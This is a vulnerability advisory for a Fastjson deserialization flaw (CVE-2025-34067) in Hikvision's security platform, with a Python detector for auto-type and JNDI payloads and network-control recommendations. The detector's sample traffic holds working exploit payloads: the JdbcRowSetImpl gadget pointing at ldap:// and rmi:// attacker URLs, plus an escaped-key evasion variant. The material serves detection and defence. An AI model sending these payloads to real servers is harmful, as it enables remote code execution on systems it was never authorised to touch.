Fastjson · Fastjson · CVE-2025-34067
**Name of the Vulnerable Software and Affected Versions**
Hikvision Integrated Security Management Platform (affected versions not specified)
**Description**
A critical deserialization vulnerability exists in the applyCT component of the Hikvision Integrated Security Management Platform because the component uses a vulnerable version of the Fastjson library. The `/bic/ssoService/v1/applyCT` API endpoint passes untrusted request data to Fastjson, and Fastjson's auto-type feature lets the JSON document itself name the Java class to instantiate (through the `@type` key), so an attacker can make the server load arbitrary classes. By choosing a class whose properties trigger a JNDI lookup and pointing that lookup at an attacker-controlled LDAP URL, the attacker can make the server fetch and execute a malicious class, achieving remote code execution on the underlying system. The Shadowserver Foundation observed exploitation evidence on 2025-02-05 UTC.
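The detection logic below is an added example for this advisory, not code from Hikvision, Fastjson or the advisory's author. It scans a constructed set of HTTP requests (the shape of the request records, the sample payloads and the `203.0.113.10` addresses are assumptions; the endpoint path is the one named above) for the two markers of a Fastjson auto-type attack: an `@type` key anywhere in the JSON body and a JNDI-style `ldap://` or `rmi://` value. It decodes the body as JSON before matching, so a `\u0040type` escape or a `Lcom.example.Foo;` descriptor-style class name, both accepted by older Fastjson releases, does not slip past a naive string match. The gadget class in the sample payload is the classic publicly documented Fastjson JNDI gadget; the advisory does not say which class was used in the wild.

```python
"""Flag Fastjson auto-type / JNDI payloads sent to the applyCT endpoint.

Added example: the request records and payloads are constructed, and the
analysis is generic Fastjson-attack detection, not the vendor's own check.
"""
import json
import re
from typing import Any, Iterator

TARGET_PATH = "/bic/ssoService/v1/applyCT"   # endpoint named in the advisory
# JNDI reference schemes an attacker can point a gadget at (ldap:// is the
# one described above; rmi:// is the other common JNDI vector).
JNDI_SCHEME = re.compile(r"^\s*(ldaps?|rmi)://", re.IGNORECASE)


def _walk(node: Any, path: str = "$") -> Iterator[tuple[str, Any]]:
    """Yield (json_path, value) for every node so nested @type keys are seen."""
    yield path, node
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from _walk(value, f"{path}[{index}]")


def _normalize_class(name: str) -> str:
    """Strip JVM-descriptor forms ("Lpkg.Cls;", "[pkg.Cls") that older Fastjson
    versions accepted as class names, so blocklists match the plain name."""
    name = name.strip()
    while name.startswith("["):
        name = name[1:]
    if name.startswith("L") and name.endswith(";"):
        name = name[1:-1]
    return name


def analyze_body(body: str) -> dict:
    """Return auto-type classes and JNDI URLs found in one JSON request body."""
    findings: dict = {"autotype_classes": [], "jndi_urls": [], "suspicious": False}
    try:
        # json.loads resolves \uXXXX escapes, so "\u0040type" becomes "@type".
        doc = json.loads(body)
    except ValueError:
        return findings   # not JSON: Fastjson would not deserialize it either
    for _path, value in _walk(doc):
        if isinstance(value, dict) and isinstance(value.get("@type"), str):
            findings["autotype_classes"].append(_normalize_class(value["@type"]))
        if isinstance(value, str) and JNDI_SCHEME.match(value):
            findings["jndi_urls"].append(value.strip())
    findings["suspicious"] = bool(findings["autotype_classes"] or findings["jndi_urls"])
    return findings


def scan_requests(requests: list[dict]) -> list[dict]:
    """Alert on requests to TARGET_PATH whose body carries auto-type markers.

    Each request is a dict with "method", "path" and "body" (assumed shape).
    """
    alerts = []
    for req in requests:
        if req.get("path", "").split("?", 1)[0] != TARGET_PATH:
            continue
        result = analyze_body(req.get("body", ""))
        if result["suspicious"]:
            alerts.append({"path": req["path"], **result})
    return alerts


# Constructed sample traffic (not captured data).
SAMPLE_REQUESTS = [
    # Benign request to the endpoint.
    {"method": "POST", "path": TARGET_PATH,
     "body": '{"ticket":"abc123","service":"portal"}'},
    # Auto-type gadget with a dataSourceName pointing at an attacker LDAP server.
    {"method": "POST", "path": TARGET_PATH,
     "body": '{"ticket":{"@type":"com.sun.rowset.JdbcRowSetImpl",'
             '"dataSourceName":"ldap://203.0.113.10:1389/Exploit","autoCommit":true}}'},
    # Same idea with an escaped key and descriptor-style class name (evasion).
    {"method": "POST", "path": TARGET_PATH + "?lang=en",
     "body": '{"ticket":{"\\u0040type":"Lcom.sun.rowset.JdbcRowSetImpl;",'
             '"dataSourceName":"rmi://203.0.113.10:1099/x"}}'},
    # Different endpoint: out of scope for this rule.
    {"method": "POST", "path": "/bic/other", "body": '{"@type":"x"}'},
]

if __name__ == "__main__":
    for alert in scan_requests(SAMPLE_REQUESTS):
        print(alert)
```

Run stand-alone it prints two alerts, one per malicious sample; the benign request and the request to another path produce none. Feeding real access logs in place of `SAMPLE_REQUESTS` only requires mapping each log record to the `path`/`body` shape the scanner expects.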
**Recommendations**
At the time of writing there is no information about a vendor release that fixes this vulnerability. Until one is available, the attack mechanics above suggest compensating controls: the attacker must reach the `/bic/ssoService/v1/applyCT` endpoint, and the server must be able to open an outbound JNDI connection (LDAP, or the related RMI vector) to attacker-controlled infrastructure. Restrict network access to the endpoint to trusted sources, block outbound LDAP and RMI connections from the platform host, and alert on requests to the endpoint whose JSON body contains an `@type` key or an `ldap://` or `rmi://` URL.